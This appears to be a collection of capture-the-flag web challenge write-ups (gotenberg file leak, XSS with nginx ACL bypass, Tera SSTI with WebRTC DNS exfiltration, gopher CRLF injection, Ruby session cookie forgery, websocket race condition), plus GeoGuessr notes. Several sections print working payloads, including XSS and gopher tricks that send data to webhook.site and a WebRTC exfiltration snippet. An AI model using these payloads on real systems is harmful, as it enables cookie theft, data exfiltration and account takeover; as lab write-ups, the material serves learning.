This challenge involved a bot periodically sending an HTML file containing the flag to a gotenberg instance, which converts it to a PDF.. The version of gotenberg was the latest at the time of the CTF, 8.17.3.

The process runs continuously:

while true; do
    curl -s 'http://gotenberg:3000/forms/chromium/convert/html' --form 'files=@"index.html"' -o ./output.pdf
    sleep 5
done

Tracing Down the Flag

Our goal is to extract the flag by interacting with the gotenberg instance.

With some source code. ) and experiments, I found that while a request is being processed:

• The uploaded HTML file is stored in /tmp/[UUID_A]/[UUID_B]/index.html.
• The generated PDF file is saved in /tmp/[UUID_A]/[UUID_B]/[UUID_C].pdf.
• UUID_A remains constant, but UUID_B is unique per request.
• Files are deleted once processing is complete.

Since the flag is stored temporarily, I needed a way to access it before it was deleted.

Leaking Directory Paths

With iframe, it is possible to leak the content of another file on the server, or list the directory if the directory does not contain an index.html file. (I had to use relative path, somehow I could not get e.g. file:///etc/passwd to work, possibly due to browser security restrictions or I did something wrong).

With the simple payload, I was about to leak the temporary file locations:

<iframe src="../" width="1000px" height="1000px"></iframe>

However, the flag files are deleted after the request is processed, I still need to find a way to get around this.

Make the Flag Stay Longer

Reading the docs of gotenberg, it runs a single Chromium instance, meaning the subsequent requests are queued while one is being processed. If the instance is busy, the subsequent uploaded HTML will be kept on the server until it is processed.

I created a large HTML files containing many iframes to make PDF rendering take some time (more than 5 seconds), and the last iframe lists the directory to the HTML file containing the flag.

<iframe src="../../" width="1000px" height="100px"></iframe>
(800 of the same iframes)
<iframe src="../../" width="1000px" height="100px"></iframe>
<iframe src="../" width="1000px" height="1000px"></iframe>

In the example, it listed the directory of /tmp/dfbe2bb7-e1ca-4cb4-ac55-f84aff6cd7dc/, which contains two subdirectories 3118c7b5-0d4d-4317-afb5-90e216d5c1ce and 5e1a4e83-99c3-4183-9967-842fa3c24fe3. One of them is for the current request, and the other is for the flag queued afterwards. Say 5e1a4e83-99c3-4183-9967-842fa3c24fe3 is for the flag, the HTML file containing the flag is in /tmp/dfbe2bb7-e1ca-4cb4-ac55-f84aff6cd7dc/5e1a4e83-99c3-4183-9967-842fa3c24fe3/index.html.

Get the Flag

Once I knew the flag’s location, I needed a way to read it before deletion. However, simply requesting the path would fail since files are deleted before the next request.

Using JavaScript for Dynamic Fetching

JavaScript is executed on the Chromium instance, so I created a payload that dynamically fetches the leaked path and loads it into an iframe.

<!DOCTYPE html>
<html lang="en">
<head>
</head>
<body>
  <iframe src="../" width="1000px" height="200px"></iframe>
  (49 of the same iframes)
  <iframe src="../" width="1000px" height="200px"></iframe>
  <script>
    fetch('https://example.com/uuids').then(response => response.json()).then(data => {
      const uuids = [data.uuids[0]];
      uuids.forEach(uuid => {
        const iframe = document.createElement('iframe');
        iframe.src = `../${uuid}/index.html`;
        iframe.width = '1000px';
        iframe.height = '200px';
        document.body.appendChild(iframe);
      })
    })
  </script>
</body>
</html>

In the payload, I also put a lot of iframes to make the JavaScript to have enough time to run. The server returns all of the directories listed, and it should contain the directory containing the flag, as well as the that request. As that request is processed first, and that directory will no longer exist, having an iframe with that path will make the PDF rendering fail, so I only take one of the UUIDs and hope it is the one containing the flag, thus it takes several attempts to get the flag.

Final Payload

To time the exploit correctly, I automate the process with a Python script, which also automatically serves the leaked paths through HTTP.

import signal
import sys
from flask import Flask
from flask_cors import CORS
import requests
import threading
import time
import re

instance_address = 'http://localhost:8642'
instance_address = 'https://7a70d65746ee40ceb53f099a7429b4d5-50133.inst3.chal-kalmarc.tf'

app = Flask(__name__)
CORS(app)

uuids = []

@app.route('/uuids')
def return_uuids():
    return {'uuids': uuids}

def upload(filename):
    r = requests.post(
        f'{instance_address}/forms/chromium/convert/html',
        files={
            'files': ('index.html', open(filename, 'rb')),
        },
    )
    return r

def signal_handler(sig, frame):
    sys.exit(0)

def run_flask():
    app.run(debug=True, use_reloader=False)

def run_upload_payload1():
    global uuids
    print('Uploading payload1.html', flush=True)
    file = upload('payload1.html').content
    uuid_pattern = rb'\b[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[1-5][0-9a-fA-F]{3}-[89ABab][0-9a-fA-F]{3}-[0-9a-fA-F]{12}/[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[1-5][0-9a-fA-F]{3}-[89ABab][0-9a-fA-F]{3}-[0-9a-fA-F]{12}\b'
    uuids = [uuid.decode().split('/')[-1] for uuid in re.findall(uuid_pattern, file)] # extract directories from the PDF
    print(f'{uuids=}', flush=True)

def run_upload_payload1_again():
    print('Uploading payload1.html again', flush=True)
    upload('payload1.html')

def upload_payload2():
    print('Uploading payload2.html', flush=True)
    return upload('payload2.html').content


if __name__ == '__main__':
    signal.signal(signal.SIGINT, signal_handler)

    flask_thread = threading.Thread(target=run_flask, daemon=True)
    flask_thread.start()

    time.sleep(1)
    
    # upload payload 1
    upload_payload1_thread = threading.Thread(target=run_upload_payload1)
    upload_payload1_thread.start()

    time.sleep(0.1)

    # upload payload 1 again to delay the server (not sure if necessary)
    upload_payload1_again_thread = threading.Thread(target=run_upload_payload1_again)
    upload_payload1_again_thread.start()

    time.sleep(2) # make sure payload 2 is finishes upload after the first two requests as payload 1 is much larger

    # upload payload 2
    pdf = upload_payload2()
    with open('flag.pdf', 'wb') as f:
        f.write(pdf)
    print('Written to flag.pdf', flush=True)

Flag: kalmar{g0tcha!_well_done_that_was_fun_wasn't_it?_we_would_appreciate_if_you_create_a_ticket_with_your_solution}

Solution summary

Since there is only one chromium instance

I uploaded a HTML with a lot of iframes, with the last iframe ../ to leak the UUID when the bot uploads

I upload another of the same file immediately just to delay the process of the next request (not sure if necessary)

I upload another HTML with some iframes to give time for JS to run, with JS to load UUIDs from an endpoint set to UUIDs leaked and take a random of the (hopefully) 4 UUIDs returned from the endpoint and hoping it is the flag one, and append a iframe ../${uuid}/index.html

Afterthought

After the CTF when I was browsing through the CTF Discord chat, I realised that instead of having a lot of iframes to delay the rendering I could have used waitDelay and waitForExpression to control the time delay and JavaScript completion which would have been more reliable and a lot easier.

web/Hello

Solution TLDR

• Bypass XSS characters filter
• Bypass nginx ACL rules for PHP

Challenge and Solution

Relatively easy challenge, with 161 solves. I built the payload iteratively to bypass the restrictions.

My teammate solved and submitted the flag about 36 minutes before I did xD.

Challenge goal is to get the flag set by the admin bot in the “HttpOnly” cookie. The index.php page is XSS-able, and and info.php page dumps phpinfo(), which shows the cookies in the request, including HttpOnly cookies.

location = /info.php {
    allow 127.0.0.1;
    deny all;
}

location ~ \.php$ {
    root           /usr/share/nginx/html;
    fastcgi_param  SCRIPT_FILENAME  $document_root$fastcgi_script_name;
    include fastcgi_params;  
    fastcgi_pass unix:/var/run/php/php8.2-fpm.sock;
}

However, as shown above, nginx.conf blocks access to info.php, and admin bot cannot acess it either. Referencing to HackTricks, it can be bypassed with http://idek-hello.chal.idek.team:1337/info.php/a.php, where nginx does not match to location = /info.php, instead it matches to location ~ \.php$ and PHP FPM processes with info.php.

function Enhanced_Trim($inp) {
    $trimmed = array("\r", "\n", "\t", "/", " ");
    return str_replace($trimmed, "", $inp);
}

if(isset($_GET['name']))
{
    $name=substr($_GET['name'],0,23);
    echo "Hello, ".Enhanced_Trim($_GET['name']);
}

index.php is XSS injectable, however it does not allow some characters. It was not able to have </script> closing tag, and I did not get script tag without closing tag or using \ instead of / in the closing tag work. I used <img> tag with onerror to make the script to run (src attribute was necessary too).

The tag looks like this:

<img src=a onerror="fetch('\\info.php\\a.php').then(r=>r.text()).then(r=>fetch('https:\\\\webhook.site\\[REDACTED]',{method:'POST',body:r}))">

The / in the URLs above are replaced with \ to bypass the filter (\\ because of escape. It was only escaped once in JavaScript, HTML does not use / escape), and it still works.

Replacing space %20 with %0C to bypass filter, and the encoded payload for admin bot is below:

http://idek-hello.chal.idek.team:1337/?name=%3Cimg%0Csrc%3Da%0Conerror%3D%22fetch%28%27%5C%5Cinfo%2Ephp%5C%5Ca%2Ephp%27%29%2Ethen%28r%3D%3Er%2Etext%28%29%29%2Ethen%28r%3D%3Efetch%28%27https%3A%5C%5C%5C%5Cwebhook%2Esite%5C%5C%5BREDACTED%5D%27%2C%7Bmethod%3A%27POST%27%2Cbody%3Ar%7D%29%29%22%3E%0A

misc/NMPZ (GeoGuessr-style)

This is some notes on my process of solving some of the challenges with the team (also with a lot of luck involved). It may contain some errors due to limited knowledge on different locations, and just write about observations and knowledge gathered during solving the challenge.

Image sizes are reduced in the blogpost.

Some useful resources for GeoGuessr-style challenges:

1. GeoHints Categorised by different meta or features, useful for example to look up which country the Google car in the task could be in.

2. Plonk It Text and image guides categorised by countries. Useful to confirm countries or try to region-guess. Google “site:www.plonkit.net stuff” as example in drunk_driving task below

3. GeoTips Similiar to Plonk It

4. overpass turbo Powerful to query features

5. Many of the shared docs e.g. for country/region specific details

drunk_driving (medium, Rwanda)

Saw lamppost with “NR 10 166” painted on it.

We could not decide the country to start with through some meta information.

I Googled site:www.plonkit.net nr, and it linked to a GeoGuessr guide page on Rwanda. With the road number NR 10, teammate solved the task.

beach_property (medium, Brazil)

Find the very unique-looking building, screenshot and search the image with Google Lens, find it to be the Veleiros Mar hotel in São Luís, Brazil. Then my teammate marked the location on the map to complete this task.

idek_islands (medium, U.S. Virgin Islands)

Teammates identified through meta (Google car etc.) the location is in U.S. Virgin Islands, and likely to be in the island in the north. The location is by the coast, with coastline kinda concaves, and with buildings nearby. The shadows points inwards the land.

I started searching through the south coast of the two main islands in the north of U.S. Virgin Islands, by looking at the street view coverage finding the roads close to coast, and sometimes enter into street view to check. Eventually found a road with street view coverage near the coast, and the buildings in the satellite view looks matching the ones in the image. It did not take too long. Entered street view and confirmed the location matches.

rise_above (hard, Indonesia)

It took a long time to solve this one.

Teammates identified the location in in Indonesia. There is top of a church in the image, signs on the other building saying “RUMAH KEPALA JAGA 1”, and teammate also identified the “Indonesian Democratic Party of Struggle” flag in the image.

I position Google maps at Indonesia and looked up “rumah kepala jaga”, it showed the name with other numbers but not “1”. I looked through some of the locations however non of them was the location. They were mostly located east-most of Sulawesi Utara on one of the main island. There were also a village with many of the same flags in the image, however that village had a church looked different. Then I zoomed out the map a bit and looked up “church” in the area, and the 2nd church I clicked on and entered street view to see was the church I was looking for (extremely lucky I guess).

It was a team effort for us to solve this challenge. I learned something new about WebRTC.

Solution summary

• SSTI in Tera::one_off to leak secret
• WebRTC to bypass CSP restrictions and exfiltrate admin user ID
• Forge admin cookie with admin user ID and secret to gain access to admin view
• Follow admin account and sort following accounts on password field to leak admin password (which is the flag)

crabspace

• Description:

  Now that Twitter is 🦀 gone 🦀, it’s time for a new social media platform.
  🦀🦀🦀🦀🦀🦀🦀🦀🦀🦀🦀🦀🦀🦀🦀🦀🦀🦀

• Author: Strellic

The source code is provided. I can create users, edit my “space”, view other users’ “space”s, and follow other users.

To view a user’s “space”, visit /space/<user id>, The user id is UUIDv4 generated when the user is created. The “space” content is rendered in an iframe, with the content in the iframe’s srcdoc attribute.

<iframe sandbox="allow-scripts"
srcdoc="<link rel='stylesheet' href='/public/axist.min.css' />{{ space }}" class="space"></iframe>

With content in srcdoc, it is rendered as HTML in the iframe even it is escaped in the template, thus we have an easy(?) XSS.

The users are defined as a struct as shown below and stored in a map.

#[derive(Debug, Serialize, Clone)]
pub struct User {
    pub id: Uuid,
    pub name: String,
    pub pass: String,
    pub following: Vec<Uuid>,
    pub followers: Vec<Uuid>,
    pub space: String,
}

The admin user with flag as the password, and a random ID is created on starting of the application.

The bot first logs in as admin, then visit an URL we provide.

Finding SSTI

Initially it was not clear how we can get the flag from what is obvious. While I was on the train I read the source code twice and with the help of documentation I found the one_off function in Tera when rendering “space” page is a bit suspicious.

ctx.tera.insert(
    "space",
    &Tera::one_off(&user.space, &ctx.tera, true).unwrap_or_else(|_| user.space.clone()),
);
ctx.tera.insert("id", &id);
utils::render(tera, "space.html", ctx.tera).into_response()

The code takes the user’s “space” as template and renders it. Tera templates documentation can be found at https://tera.netlify.app/docs/#templates.

When I printed out the template context with {{ __tera_context }}, I got:

{ "user": { "followers": [], "following": [], "id": "af787749-d532-4d37-94a6-2d6bc4201f63", "name": "lollol", "pass": "", "space": "{{ __tera_context }}" } }

The context includes the user struct, which includes the ID of the logged in user. However, the password is set to empty string when the context is created:

user = USERS.get(&id).map(|v| User {
    pass: "".to_string(),
    ..v.clone()
});

We can use SSTI to leak the secret for session cookie with {{ get_env(name="SECRET") }}. With the secret and the user ID of admin, we can forge a session cookie to login as admin.

Leak admin user ID

With the SSIT which can render the user ID and XSS, leaking the admin user ID should be easy right? However, with the very strict fetch directive CSP below, we tried including fetch API, WebSocket, meta tag and JS redirect, form and DNS prefetch, but had no luck exfiltrating the data. I could not find any endpoint on within the challenge that I could use style-src to exfiltrate the data neither.

default-src 'none'; style-src 'self'; script-src 'unsafe-inline'; frame-ancestors 'none'

I then reading through all non-fetch directives in CSP, and some research. While getting ready to go to bed, thinking about all the cases where a webpage makes request to server, WebRTC came to my mind (I have also noticed a very new TR about WebRTC, which may or may not be related). As I do not know much about WebRTC, I put a message on our Discord channel before I went to bed.

The next morning, I started with some WebRTC examples. The payload is limited to only 200 characters, with some trial and error, I managed to craft a minimal payload (and minified with https://www.toptal.com/developers/javascript-minifier) that would do DNS request for the STUN server I specify:

<script>async function a(){c=({iceServers:[{urls:"stun:{{user.id}}.x.cjxol.com:1337"}]})(p=new RTCPeerConnection(c)).createDataChannel("d"),await p.setLocalDescription()}a();</script>

With whitespace added to make it be more readable in the blogpost (however it’s more than 200 characters including whitespace):

<script>
async function a(){
    c={iceServers:[{urls:"stun:{{user.id}}.x.cjxol.com:1337"}]}
    (p=new RTCPeerConnection(c)).createDataChannel("d")
    await p.setLocalDescription()
}
a();
</script>

The port does not matter, as we are exfiltrating through DNS request. The user ID is included in the hostname and sent through DNS request.

Getting the flag

The admin account has access to admin view for each user (except admin itself). The admin view has the lists of followers and followings of the user. The lists are sorted with field specified in the URL query parameter. It is possible to sort by password field using ?sort=pass.

We can have a main account to follow other users. We can then create a list of users with selected password, and follow them along with admin on our main account. With the admin view, we can list the followings of the main account sorted by password, and we can get the flag character by character. This can be scripted with preparing the whole following list and get one character each time we visit the admin view, or can script with binary search. (This is kinda pain to extract the flag, thanks to my teammate implemented the solution.)

Got the flag 🦀:

corctf{b3tter_name_th4n_x}

3 web challenge writeups in this post:

• wait-an-eternity
• go-gopher
• gopher-revenge (got first blood on this challenge! Not finishing the detailed writeup, but with a summary)

wait-an-eternity

• Description:

  My friend sent me this website and said that if I wait long enough, I could get and flag! Not that I need a flag or anything, but I’ve been waiting a couple days and it’s still asking me to wait. I’m getting a little impatient, could you help me get the flag?

• Author: voxal
• Entry point: waiting-an-eternity.amt.rs

First eternity

The webpage just had text “just wait an eternity”. When inspect the request, there is a “Refresh” header with a huge value and url with a secret code.

Another eternity

Visit the url in the “Refresh” header, it shows a page saying “welcome. please wait another eternity.”.

Inspect the request, it sets a cookie “time” with a value appears to be the current timestamp like 1690326049.1573777. With the cookie set, refresh the page, and the page shows text like “you have not waited an eternity. you have only waited 228.13574051856995 seconds”. The time mentioned in the message appears to be the difference between the current timestamp and the timestamp in the cookie.

Sets the cookie to a large value, it says have only waited a large negative number of seconds. Sets the cookie to a negative value, it says have waited a large number of seconds, but there is still no flag.

The message told to wait an eternity, but how long is an eternity? The internet says the definitions of eternity is “infinite time”, “time that never ends” or “a very long time”. Hmm, how long the website would consider to be an eternity? Look up gunicorn that appears to be the web server according to the response header, the website is running Python. In Python, a number (except -inf) minus -inf would be inf. So, if the cookie value is -inf, the number of seconds have waited would be inf, and website would consider it to be an eternity.

After two eternities, I got the flag:

amateursCTF{im_g0iNg_2_s13Ep_foR_a_looo0ooO0oOooooOng_t1M3}

Speculation

The web server is probably taking value from the cookie, and use float() to convert it to a float, thus float('-inf') would be float -inf. Number of seconds waited is calculated by subtracting the float value from the current timestamp. (Actually, yes, can confirm with the source code)

go-gopher

This challenge was cheesed with subdomains or certain domain names because it only checks the host prefix. There is a revenge challenge gopher-revenge.

• Description:

  psst… i know flag sharing isn’t allowed, and i found this page where someone seems to be recieving flags from someone else. can you somehow find a way to hijack this site so it gives me flags? thanks.

• Author: voxal
• Entry point:
  • gopher://amt.rs:31290/
  • gopher-bot.amt.rs
• Downloads:
  • bot.go
  • main.go

The challenge

Submit and Visit function for bot

func Submit(w http.ResponseWriter, r *http.Request) {
	r.ParseForm()
	u, err := url.Parse(r.Form.Get("url"))
	if err != nil || !strings.HasPrefix(u.Host, "amt.rs") {
		w.Write([]byte("Invalid url"))
		return
	}
	w.Write([]byte(Visit(r.Form.Get("url"))))
}
func Visit(url string) string {
	fmt.Println(url)
	res, err := gopher.Get(url)
	if err != nil {
		return fmt.Sprintf("Something went wrong: %s", err.Error())
	}
	h, _ := res.Dir.ToText()
	fmt.Println(string(h))
	url, _ = strings.CutPrefix(res.Dir.Items[2].Selector, "URL:")
	fmt.Println(url)
	_, err = http.Post(url, "text/plain", bytes.NewBuffer(flag))
	if err != nil {
		return "Failed to make request"
	}
	return "Successful visit"
}

The bot will make Gopher request to the url provided, extract the URL from the selector of the 3rd item (at index 2) in the response, and make a POST request to the URL with the flag.

The bot does restrict the host of the Gopher url to start with amt.rs, however this can be easily bypassed with subdomains like gopher://amt.rs.cjxol.com:31290/. The the server can response with my URL in the relative position, the bot would make a POST request to my URL with the flag. The URL for the POST request is not restricted.

Here is my Gopher server code:

package main
import (
        "fmt"
        "log"
        "git.mills.io/prologic/go-gopher"
)
func hello(w gopher.ResponseWriter, r *gopher.Request) {
        w.WriteInfo("Hello!")
        w.WriteInfo("again")
        w.WriteItem(&gopher.Item{
                Selector:       "https://webhook.site/[reducted]",
        })
        fmt.Println("hello")
}
func main() {
        gopher.HandleFunc("/", hello)
        log.Fatal(gopher.ListenAndServe("0.0.0.0:31337", nil))
}

Here is the Gopher response:

iHello!         error.host      1
iagain          error.host      1
        https://webhook.site/[reducted]       ::      31337
.

gopher-revenge

This writeup is updated on 28 July 2023.

Got first blood on this challenge (this is POG!). The challenge had a total of 19 solves during the CTF.

• Description:

  you guys are going to regret ever crossing me.

  Later added the following clarification/hint due to a few teams with very close solutions fails submitting the correct flag:

  the flag in “flag.txt” is the exact same flag you need to submit

• Author: voxal
• Entry point:
  • The Gopher endpoint gopher://amt.rs:31290/ for go-gopher is still useable to this challenge (implied)
  • hell.amt.rs (the bot user interface)
• Downloads
  • The Gopher server code is still the same as for go-gopher (implied)
  • bot.go updated from go-gopher

The challenge

Submit and Visit function of the bot.

func Submit(w http.ResponseWriter, r *http.Request) {
	r.ParseForm()
	u, err := url.Parse(r.Form.Get("url"))
	if err != nil || u.Host != "amt.rs:31290" {
		w.Write([]byte("Invalid url"))
		return
	}
	w.Write([]byte(Visit(r.Form.Get("url"))))
}
func Visit(gopherURL string) string {
	fmt.Println(gopherURL)
	res, err := gopher.Get(gopherURL)
	if err != nil {
		return fmt.Sprintf("Something went wrong: %s", err.Error())
	}
	rawURL, _ := strings.CutPrefix(res.Dir.Items[2].Selector, "URL:")
	fmt.Println(rawURL)
	u, err := url.Parse(rawURL)
	etldpo, err2 := publicsuffix.EffectiveTLDPlusOne(u.Host)
	if err != nil || err2 != nil || etldpo != "amt.rs" {
		return "Invalid url"
	}
	resp, err := http.Post(u.String(), "application/x-www-form-urlencoded",
		bytes.NewBuffer([]byte(fmt.Sprintf(
		"username=%s&password=%s", randomString(20), flag))))
	if err != nil {
		return "Failed to make request"
	}
	cookies := resp.Cookies()
	token := ""
	for _, c := range cookies {
		if c.Name == "token" {
			token = c.Value
		}
	}
	if token != "" {
		return fmt.Sprintf("Thanks for sending in a flag! Use the following token once i get the gopher-catcher frontend setup: %s", token)
	} else {
		return "Something went wrong, my sever should have sent a cookie back but it didn't..."
	}
}

Similar to before as in go-gopher, the bot makes Gopher request to an URL we provide, and then makes a HTTP POST request to a URL extracted from the selector of the second item in the Gopher response. The HTTP request contains a random string as “username” and the flag as “password”. The value of the cookie named “token” from the HTTP response will then be shown to us.

Take control of the URL in the response

Unlike in go-gopher with the cheese to bypass the Gopher URL check, I could not find a way to bypass the check with u.Host != "amt.rs:31290". This means I have to provide the Gopher URL to this host.

The Gopher Protocol

Reading RFC 1436 about the Gopher protocol, Gopher is a text-based protocol. The server responses with each item in each line terminated with CR LF, and a period “.” on its own line after the last item. For each line, the first character describes the type of the item, and all character following until a tab is the “user display string”. Each item after ths is also tab-separated. The next field is “selector string”. The next two fields are the domain-name and port for the document or directory described in this line.

In the example requests to the challenge server:

$ nc amt.rs 31290
/submit/lol
iHello lol              error.host      1
iPlease send a post request containing your flag at the server down below.              error.host      1
0Submit here! (gopher doesn't have forms D:)    URL:http://amt.rs/gophers-catcher-not-in-scope  error.host      1
.

The client sends the line “magic string” /submit/ for the file/directory. In the response, the first character of each line “i” means the item is for info, 0 means the item is a document (though in this challenge I do not need to care abut the difference). In the 3rd item, the selector is “URL:http://amt.rs/gophers-catcher-not-in-scope”.

The challenge Gopher server

The interesting function in the Gopher server is submit, as it appears to point to a “non-exist” flag catcher” (which I confirmed with the CTF organisers that is indeed does not exist). Also the function makes use of the client input.

func submit(w gopher.ResponseWriter, r *gopher.Request) {
	name := strings.Split(r.Selector, "/")[2]
	undecoded, err := url.QueryUnescape(name)
	if err != nil {
		w.WriteError(err.Error())
	}
	w.WriteInfo(fmt.Sprintf("Hello %s", undecoded))
	w.WriteInfo("Please send a post request containing your flag at the server down below.")
	w.WriteItem(&gopher.Item{
		Type:        gopher.FILE,
		Selector:    "URL:http://amt.rs/gophers-catcher-not-in-scope",
		Description: "Submit here! (gopher doesn't have forms D:)",
		Host:        "error.host",
		Port:        1,
	})
}
func main() {
	mux := gopher.NewServeMux()
	mux.HandleFunc("/", index)
	mux.HandleFunc("/submit/", submit)
	log.Fatal(gopher.ListenAndServe("0.0.0.0:7000", mux))
}

Noticing the string after the 2nd “/” in the selector or “magic string” in the request is included in the response. The bot takes the 3rd item in the response, and I am able to inject into the 1st line. So it is possible to make the selector in the 3rd item being a URL we want, and push the items after the 1st item in the original response further down.

Gopher URL

RFC 4266 specifies the Gopher URI scheme. I then used the information to build the Gopher URL for the Gopher request.

In the URL example

gopher://amt.rs:31290/1/submit/lol

where 1 is the “gophertype”, with /submit/lol being the “selector string”.

Putting it together

Putting it together and generate the payload with the following Python script:

from pwn import *
r = remote('amt.rs', 31290)
TAB = '%09'
CRLF = '%0D%0A'
# url = 'https://cps.amt.rs/register.php'
urlencoded_url = 'https%3A%2F%2Fcps%2Eamt%2Ers%2Fregister.php'
url_line_content = f'0S{TAB}{urlencoded_url}{TAB}error.host{TAB}1'
s = f'/submit/lol{TAB}{TAB}error.host{TAB}1{CRLF}iA{TAB}{TAB}error.host{TAB}1{CRLF}{url_line_content}{CRLF}iA'
print('[payload] Magic string:', s)
r.send(s.encode())
r.send(b'\r\n')
response = r.clean(timeout=1)
print('[response] Response:')
print(response.decode())
s = s.replace('%', '%25')
print('[payload] Gopher URL:', f'gopher://amt.rs:31290/1/{s}')

This results in the bot POST to https://cps.amt.rs/register.php with the flag as the password. The URL is for another SQLi challenge (which was worth 0 point because of the solution was leaked), which I did not manage to solve (though I tried to solve it and only the next morning I realised I did not need to solve it and I already had the solution for gopher-revenge). The /register.php takes exactly username and password as the POST parameters, and returns a cookie named “token” in the response. The bot then shows the value of the cookie. When authenticated with the cookie, the site shows the password of the user.

Copying the password into the flag submission did not work. I did ask the CTF organisers to confirm the code running on the server for the SQLi challenge is the same as the downloadables, and did not do anything special to the flag. The CTF organisers confirmed the code is the same, and said a few teams have stuck here. They then added “the flag in “flag.txt” is the exact same flag you need to submit” to the challenge description as a hint. Seeing the space showing in the password, I then realised it could have been a “+” in the original flag. I then tried to submit the flag with “+” instead of space, and it worked. I realised as I recently had the issue with “+” in the URL.

Challenge Description

My friend told me there’s a secret page on this forum, but it’s only for administrators.

A link to the challenge and downloadable of the source code are provided.

A First Look

The web app is a forum, with two threads posted.

Viewing one of the threads, it can be seen that the username of admin is janitor.

The web app is written in Ruby.

The /flag endpoint and is_allowed_ip function is especially interesting:

get "/flag" do
  if !session[:username] then
    erb :login
  elsif !is_allowed_ip(session[:username], request.ip, config) then
    return [403, "You are connecting from untrusted IP!"]
  else
    return config["flag"] 
  end
end

def is_allowed_ip(username, ip, config)
  return config["mods"].any? {
    |mod| mod["username"] == username and mod["allowed_ip"] == ip
  }
end

It checks the if the user logged in is a moderator and if the IP address is the allowed IP address in a config file.

Craft Admin Cookie

When clicking on “New Thread” without filling in anything, the website shows an error page with backtrace and environment information. The session secret as well as how the session cookie is encoded is revealed.

The session is implemented with Rack Protection. With some research into the source code, and from environment info, it can be seen that the session cookie is encoded and encrypted as follows:

1. The data is first serialised with Marshal
2. It is then encrypted with AES-256-GCM with the first 32 bytes of the session secret as the key
3. The encrypted data, IV and authentication tag are then encoded with URL-safe base64
4. The encrypted data, IV and authentication tag are then concatenated with a -- delimiter

My script to modify the session cookie into an admin cookie is as follows:

import base64
import urllib.parse
import rubymarshal.reader, rubymarshal.writer
from Crypto.Cipher import AES

secret = bytes.fromhex('[secret hex string]')
cookie = '[original cookie]'
ct, iv, auth = cookie.split('--')
ct, iv, auth = map(urllib.parse.unquote, [ct, iv, auth])
ct, iv, auth = map(base64.b64decode, [ct, iv, auth])
cipher = AES.new(secret[:32], AES.MODE_GCM, iv)
dec = cipher.decrypt(ct)
d = rubymarshal.reader.loads(dec)

d['username'] = 'janitor'
m = rubymarshal.writer.writes(d)
cipher = AES.new(secret[:32], AES.MODE_GCM, iv)  # I just reuse the original IV
ct, auth = cipher.encrypt_and_digest(m)
ct, iv, auth = map(base64.b64encode, [ct, iv, auth])
ct, iv, auth = map(urllib.parse.quote, [ct, iv, auth])
cookie = f'{ct}--{iv}--{auth}'
print(cookie)

Bypass IP Restriction

With the admin cookie, the /flag endpoint now does not prompt to login, but instead shows a 403 error page with message “You are connecting from untrusted IP!”.

Spoof the IP Address

In nginx.conf, it can be seen that the REMOTE_ADDR header is set to localhost with the following:

proxy_set_header REMOTE_ADDR localhost;

Research on how the app gets request.ip, found in this Stack Overflow answer, that if the REMOTE_ADDR is in reserved private subnet ranges, it will instead use the X-Forwarded-For header, thus the IP address can be spoofed with X-Forwarded-For.

Find the Allowed IP Address

However, the allowed IP address is still unknown. Looking at the source code, the user colour uses in each thread uses the first 6 characters of the hex value of SHA-256 of the IP address and thread ID concatenated together.

<% user_color = Digest::SHA256.hexdigest(reply[2] + @id).slice(0, 6) %>

In the above code, reply[2] is the IP address of the user who posted the reply, and @id is the thread ID.

Both of thread 1 and thread 2 have a reply from the admin, so the IP address can be found by brute forcing to find the IP address that produces the matching hashes for both threads.

from Crypto.Hash import SHA256
from multiprocessing import Pool
target = '32cae2'
thread = 1
def brute(a):
    for b in range(256):
        for c in range(256):
            for d in range(256):
                ip = f'{a}.{b}.{c}.{d}'
                x = ip + str(thread)
                h = SHA256.new(x.encode()).hexdigest()[:6]
                if h == target:
                    print(f'{a}.{b}.{c}.{d}', flush=True)
if __name__ == '__main__':
    with Pool(8) as p:
        p.map(brute, range(256))

Putting everything together, the flag is:

justCTF{1_th1nk_4l1ce_R4bb1t_m1ght_4_4_d0g}

Additional Notes

Rack Protection tracks user agent, and if the user agent is changed, the session cookie will be invalidated. Either the user agent must be spoofed, or the session cookie must be regenerated.

Overall good CTF with challenging original fun challenges.

On this page:

• goldinospizza2 - Web, websocket API, exploit race condition
• Print template 2 - SSRF via TLS poisoning to request Memcached. I did not solve this challenge, did the writeup based on discussions.

goldinospizza2

The challenge was released at about 2:40 AM BST as the “patched improved version of goldinospizza”, which was about over 8 hours into the CTF. It was just before I was planning to go to bed, but the challenge looked solvable😅.

The challenge was a web challenge with a website that allowed you to order pizza with a registered account. Most of the pizzas’ prices were ranging between 6 and 15, but there was one pizza named “The flagship of pizzas” that costs 1,000,000. The flag will be shown if this pizza is successfully ordered. The initial account balance is 30.

Looking through the code, there are two websocket API functions that are interesting, one is order, and another one is cancel. The order function is used to order a pizza, and the cancel function is used to cancel an order and get refund.

The order function is implemented as follows:

def order(data, ws, n):
    # Some checks on input omitted
    for item in data["orders"]:
        # Some checks on input omitted
        if type(item["quantity"]) is not int:
            db.session.rollback()
            raise AssertionError("ONE OF YOUR 🍕 'quantity' IS NOT INT")
        if item["quantity"] <= 0:
            db.session.rollback()
            raise AssertionError("ONE OF YOUR 🍕 'quantity' IS NOT VALID")
        product = db.session.execute(db.select(Product).filter(
            Product.id == item["product"])).scalars().one_or_none()
        if product is None:
            db.session.rollback()
            raise AssertionError("WE DON'T SELL THAT 🍕")
        quantity = item["quantity"]
        current_user.balance -= product.price * quantity
        if current_user.balance < 0:
            db.session.rollback()
            raise AssertionError("NO 🍕 STEALING ALLOWED!")
        db.session.add(Order(
            user_id=current_user.id,
            product_id=product.id,
            product_quantity=quantity,
            product_price=product.price
        ))
        if product.id == 0 and quantity > 0:
            ws.send(
                f"WOW you are SO rich! Here's a little extra with your golden special 🍕: {os.environ['FLAG']}")
    db.session.add(current_user)
    db.session.commit()
    return len(data["orders"]), {"ok": True, "balance": current_user.balance, "orders": _orders()}

In the code, I identified that there is a race condition that can be exploited to make total order larger than we have in the balance, and cancel the order to refund so we can have more balanced than we started with.

We can blast with multiple websocket requests to make order, and if the previous order has not been committed to the database, the next request is still checked against the old balance.

To make programming easier, I did scripting within the browser console within the context of the website. After some initial test, my balance increased to 66.00 from the initial 30.00.

The script I used to blast the order is as follows:

let message = {
    "request": "order",
    "orders": [{
        "product": 19,
        "quantity": 9792,
    }, ],
}
for (let i = 1; i < 20; i++) {
    const ws = new WebSocket(`wss://goldinospizza2.challs.m0lecon.it/sock`);
    ws.addEventListener("open", (event) => {
        ws.send(JSON.stringify(message))
    })
}

